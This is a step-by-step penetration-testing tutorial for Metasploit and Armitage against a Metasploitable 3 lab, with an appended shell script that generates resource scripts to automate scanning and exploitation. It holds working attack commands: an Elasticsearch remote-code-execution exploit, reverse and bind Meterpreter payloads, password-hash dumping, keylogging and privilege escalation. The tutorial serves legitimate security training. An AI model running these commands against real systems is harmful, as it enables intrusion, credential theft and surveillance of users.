[ Pen Testing ] :: Step by Step: Metasploit and Armitage

Metasploit and Armitage

Starting Metasploit

Generic Metasploit installation instructions for any OS:
https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework

Instructions for starting Metasploit in Kali:
https://docs.kali.org/general-use/starting-metasploit-framework-in-kali

The Metasploit package that ships with Kali needs its PostgreSQL database started and initialized once before the database-backed commands (db_nmap, hosts, services, workspace) will work.

service postgresql start
msfdb init # only needed once; creates the database, role and config file

Starting msfconsole

msfconsole

Once msfconsole is running:

msf>db_status # check database status; it should report a postgresql connection
# In Metasploit 4, if module searches are slow, rebuild the module cache:
msf>help
msf>db_rebuild_cache # note this command in help
# now searches like:
msf>search ftp
# will be much faster. Metasploit 5 and later keep the module cache in the
# database automatically and no longer have db_rebuild_cache.

Database credentials are stored in database.yml. With the Rapid7 installer that is:
/opt/metasploit/apps/pro/ui/config/database.yml
On Kali, msfdb init writes it to:
/usr/share/metasploit-framework/config/database.yml

Metasploit Modules

In a separate Bash window, go to the Metasploit folder.

cd /usr/share/metasploit-framework
ls

Note the modules directory.

cd modules
ls

See the six different types of modules (folder names): auxiliary, encoders, exploits, nops, payloads and post. Metasploit 5 added a seventh, evasion.

cd exploits
ls

The folders inside exploits/ are named for the target platform. Change to windows/smb (look around as you go).

cd windows
ls
cd smb
ls

Search for a Module

In the msfconsole window, use search:

msf> search psexec # note that we don't use the file extension .rb

Copy the module path from the search results and load it with use:

msf> use exploit/windows/smb/psexec # again, no .rb extension

Your context changes: the prompt now shows the loaded module. While the module is loaded, use the info command for its description, targets and options.

msf exploit(psexec) > info

You can look at the module source back in Bash using less (or more or cat), from the modules/exploits/windows/smb directory you changed to above:

less psexec.rb

Look carefully at the options the module registers (register_options): those are the variables you will set later. Close less.

Use back whenever you need to unload the current module and return to the top-level msf> prompt. But don't do that just yet.

msf exploit(psexec) > back

The msfconsole supports tab completion, so typing "aux" then Tab will complete "auxiliary".

msf > use aux<Tab>
# aux automatically expands to auxiliary

Workspaces

A workspace keeps one project’s data separate from another’s. See this article on workspaces:
https://www.ceos3c.com/hacking/metasploit-how-to-use-workspaces-and/. (Yes the URL ends that way; CMSs can generate some funny links.)

Check the syntax, list your workspaces and create a workspace:

msf exploit(psexec) > workspace -h # usage
msf exploit(psexec) > workspace # show all workspaces; the current one is starred
msf exploit(psexec) > workspace -a ms3 # create a workspace

When you create a workspace you automatically change to it. You can change workspaces like this, but don’t do it yet:

msf > workspace default

Instead, while you’re in your new workspace, run the hosts command:

msf > hosts

You won't have any listed yet, but now you know how to see the ones you find. While you're at it try the services command, and the help command to see the list of Database Backend Commands (hosts, services, vulns, notes, loot, workspace and the db_* commands).

msf > services
msf > help

Scanning

See Hacking Metasploitable 3: Discovering Remote Services with NMap at https://www.youtube.com/watch?v=sHS4kHKcQhc .

Perform a preliminary scan of the target within msfconsole. You could run nmap directly from msfconsole, but the db_nmap command (which takes the same arguments as nmap) also stores the scan results in the Metasploit database.

msf > db_nmap -sn -n -v --exclude 192.168.0.10 192.168.0.1-100

... where 192.168.0.10 is your own IP address.

-sn # host discovery only, no port scan; on the local Ethernet segment nmap uses ARP requests, which work when ICMP ping is blocked
-n # don't bother doing any DNS lookups
-v # verbose output
--exclude # leave your own machine out of the scan
1-100 # scan a small range so we aren't too noisy

See your results with hosts command.

msf > hosts

We could do a fast (-F) scan of just the 100 most common ports:

msf > db_nmap -F -sS -n -v --reason --open 192.168.0.25

... assuming 192.168.0.25 is the target you've found.

-F # fast mode: the 100 most common ports instead of the default 1000
-sS # SYN (half-open) scan; needs raw sockets, so run as root
-n # remember no DNS
--reason # show why nmap put each port in its state (e.g. syn-ack)
--open # only report ports that are open (or possibly open)

Run the services command:

msf > services

Now you can see target services. Investigate each for vulnerabilities/exploits. In Metasploitable 3, the Elasticsearch service is a target:

msf exploit(psexec) > search Elasticsearch

You'll get a list of possible modules. Research and select one. (The module below abuses dynamic MVEL scripting in old Elasticsearch versions to run code on the server.)

msf exploit(psexec) > use exploit/multi/elasticsearch/script_mvel_rce
msf exploit(script_mvel_rce) > show options
msf exploit(script_mvel_rce) > set RHOST 192.168.0.25 # sets value; in Metasploit 5+ the option is called RHOSTS
msf exploit(script_mvel_rce) > set RHOST # with no value, shows the current value
msf exploit(script_mvel_rce) > show advanced # lists advanced variables

You can set a global variable that every module in this msf session sees:

msf exploit(script_mvel_rce) > setg RHOST 192.168.0.25

A module-level set takes precedence over a global setg for that module.

Once you've set the necessary vars, you can run the exploit command:

msf exploit(script_mvel_rce) > exploit

The resulting messages are tagged by color: [*] blue is status, [+] green is success, [-] red is an error and [!] yellow is a warning. Depending on the exploit, you may get a Meterpreter session.

Post-exploit

Now we need to run post-exploit modules. Check them out in Bash (you are still in modules/exploits/windows/smb, so go up three levels):

cd ../../../post/
ls
cd windows/
ls

Subfolders are named for the action they'll take (gather, manage, escalate, capture, ...).

Back in msf:

meterpreter > run post/windows/manage/<TAB>
# to see candidate post modules
meterpreter > run post/windows/manage/<module> # the one you chose from the list

Note that a Java Meterpreter (the payload used with this Elasticsearch exploit) only carries the stdapi extension, not the native Windows ones (priv, kiwi, railgun), so post modules that need them will fail until you have a native windows/meterpreter session.

Background meterpreter to get back to msf:

meterpreter > background
msf exploit(script_mvel_rce) >

Payloads

Look at payloads:

msf exploit(script_mvel_rce) > show # with no argument lists every module category; use a category instead
msf exploit(script_mvel_rce) > show payloads # only payloads compatible with this module; note plural lowercase
msf exploit(script_mvel_rce) > show <TAB> <TAB> # for a list of categories

Set the payload. A Meterpreter session is generally the most capable, but its staging and traffic are well known to IDS/AV signatures. A reverse payload also needs LHOST (your own address) so the target knows where to connect back.

msf exploit(script_mvel_rce) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(script_mvel_rce) > set LHOST 192.168.0.10
msf exploit(script_mvel_rce) > run

Upgrading from cmd.exe to a Meterpreter Session

Let’s do this as a walk-through. Our victim is 192.168.0.25, and we are 192.168.0.10.

If you’d like to see this as a video, go to:
https://www.youtube.com/watch?v=LRS05gvcvdk

1. In Terminal 1 (Bash), ping and scan (-sS needs root):

fping 192.168.0.25

nmap -sS -sV -T4 192.168.0.25

2. Open Terminal 2 and fire up msfconsole (the cd is the video's old install path; on Kali msfconsole is on PATH and you can skip it):

cd /pentests/exploits/framework3

msfconsole

3. Start a handler. multi/handler does not exploit anything itself: for a bind payload it connects to a payload that is already running and listening on the target (here a bind shell on the default port 4444), so the target must already have that payload running, for example one built with msfvenom. Payload names are lowercase:

msf > use multi/handler

msf > set payload windows/shell_bind_tcp

4. Configure. A bind payload needs RHOST (where to connect to); a reverse payload would need LHOST (where to listen) instead:

msf > show options

msf > set RHOST 192.168.0.25

5. Exploit:

msf > exploit

Bang: if everything works you get a Windows cmd shell.

Use Ctrl-Z to background this session. Confirm with y.

Back in msfconsole, confirm we have a session on the Windows box:

msf > sessions -l # that's an ell

View options:

msf > sessions -h

Note the -u option (upgrade a shell session to Meterpreter).

It might be a good time to set options globally:

msf > setg LHOST 192.168.0.10 # me

msf > setg RHOST 192.168.0.25 # target

Now upgrade that shell in session 1:

msf > sessions -u 1

You’ll eventually get a message: session 2 opened.

Confirm the session exists by listing again:

msf > sessions -l # that's an ell

Now go to that session:

msf > sessions -i 2

Boom! You’re in the remote Meterpreter!

meterpreter > sysinfo

meterpreter > hashdump # dumps the local SAM hashes; needs SYSTEM, so come back to it after getsystem if it fails

meterpreter > screenshot

meterpreter > keyscan_start

keyscan_start records keystrokes on the desktop of the process Meterpreter is running in. If the session runs as SYSTEM or another service account, migrate into a process on the logged-on user's desktop first (migrate <pid of explorer.exe>), or the user's keystrokes will not be captured.

Ha ha, open Notepad in the Windows victim and write  yourself a little note:

Roses are red,
Violets are blue,
All of my base
BELONG TO YOU!

Back in Meterpreter, run:

meterpreter > keyscan_dump

... and see the nice little message to yourself. You're a poet.

Try the most elementary privilege escalation:

meterpreter > getuid # who are we now?

meterpreter > getsystem

meterpreter > getuid

If this works you're huge and golden: the SYSTEM user. getsystem needs an account that already holds local administrator rights or SeImpersonatePrivilege; if it fails, look at the post/windows/escalate and exploit/windows/local modules.
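The two msfconsole procedures above (the scan-then-exploit sequence in the Scanning and Payloads sections, and the handler walkthrough just finished) can be replayed from a resource script instead of being typed in by hand. The shell script below is an added example written for these notes, not code from the page's author or from the Metasploit project. It assumes Metasploit 5 or later (where exploit modules take RHOSTS; the older RHOST name in the notes still works as an alias) and that, as usual in resource scripts, a <ruby> block can call framework and run_single. The workspace name, addresses and port are the ones used in the notes; the function names (is_ipv4, scan_rc, handler_rc) are mine.

```shell
#!/usr/bin/env bash
# Added example (not from the page or from Metasploit): build resource
# scripts for the scan-then-exploit procedure and for a payload handler,
# to run with:  msfconsole -q -r <file.rc>
# Assumes Metasploit 5+, where exploit modules take RHOSTS.
set -eu

# True if $1 is a dotted-quad IPv4 address with every octet in 0..255.
is_ipv4() {
  case "$1" in
    ""|*[!0-9.]*) return 1 ;;          # only digits and dots allowed
  esac
  local IFS=. n
  set -- $1                            # split on dots into $1..$4
  [ "$#" -eq 4 ] || return 1
  for n; do
    [ -n "$n" ] && [ "$n" -le 255 ] || return 1
  done
}

# Resource script for: workspace, host discovery, port scan, module setup,
# launch as a background job. Mirrors the db_nmap/use/set/exploit steps.
# Usage: scan_rc <workspace> <my_ip> <discovery_range> <target_ip> [module] [payload]
scan_rc() {
  local ws="$1" me="$2" range="$3" target="$4"
  local module="${5:-exploit/multi/elasticsearch/script_mvel_rce}"
  local payload="${6:-java/meterpreter/reverse_http}"
  is_ipv4 "$me"     || { echo "bad attacker IP: $me" >&2; return 1; }
  is_ipv4 "$target" || { echo "bad target IP: $target" >&2; return 1; }
  cat <<EOF
# generated by scan_rc: workspace $ws, attacker $me, target $target
<ruby>
  # Bail out if there is no database: db_nmap results would be lost.
  unless framework.db.active
    print_error("No database connection: run 'msfdb init' and restart msfconsole")
    run_single("exit -y")
  end
</ruby>
workspace -a $ws
db_nmap -sn -n --exclude $me $range
hosts
db_nmap -F -sS -n --reason --open $target
services
setg LHOST $me
use $module
set RHOSTS $target
set PAYLOAD $payload
show options
# -j runs the exploit as a job so the console stays usable; see 'jobs' and 'sessions -l'
exploit -j
EOF
}

# Resource script for exploit/multi/handler. A bind payload listens on the
# target, so the handler connects out and needs RHOST; a reverse payload
# connects back to us, so the handler listens and needs LHOST.
# Usage: handler_rc <payload> <host> <port>
handler_rc() {
  local payload="$1" host="$2" port="$3" hostvar
  is_ipv4 "$host" || { echo "bad host: $host" >&2; return 1; }
  case "$port" in ""|*[!0-9]*) echo "bad port: $port" >&2; return 1 ;; esac
  [ "$port" -ge 1 ] && [ "$port" -le 65535 ] || { echo "bad port: $port" >&2; return 1; }
  case "$payload" in
    */bind_*|*_bind_*)       hostvar=RHOST ;;
    */reverse_*|*_reverse_*) hostvar=LHOST ;;
    *) echo "cannot tell bind from reverse in '$payload'" >&2; return 1 ;;
  esac
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set $hostvar $host
set LPORT $port
# -z: do not drop into the session automatically; pick it up with 'sessions -i'
exploit -j -z
EOF
}

# Command-line entry point, e.g.
#   ./msf_rc.sh scan ms3 192.168.0.10 192.168.0.1-100 192.168.0.25 > ms3.rc
#   ./msf_rc.sh handler windows/shell_bind_tcp 192.168.0.25 4444 > handler.rc
case "${1:-}" in
  scan)    shift; scan_rc "$@" ;;
  handler) shift; handler_rc "$@" ;;
esac
```

Save it as msf_rc.sh, generate a script with ./msf_rc.sh scan ms3 192.168.0.10 192.168.0.1-100 192.168.0.25 > ms3.rc and run it with msfconsole -q -r ms3.rc. The bind/reverse split in handler_rc is the check worth keeping: a handler for a bind payload needs RHOST, one for a reverse payload needs LHOST, and mixing the two up is the commonest reason a handler never gets a session.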

Armitage

Wish you had Metasploit Pro? Try using Armitage, a GUI front end on top of the framework that adds target visualisation, point-and-click module launching and team collaboration, which covers many of the conveniences people want Pro for. Armitage is no longer actively maintained, so check whether your Kali release still packages it.
https://www.binarytides.com/run-metasploit-armitage-kali/

Start Armitage (the PostgreSQL service must be running first):

armitage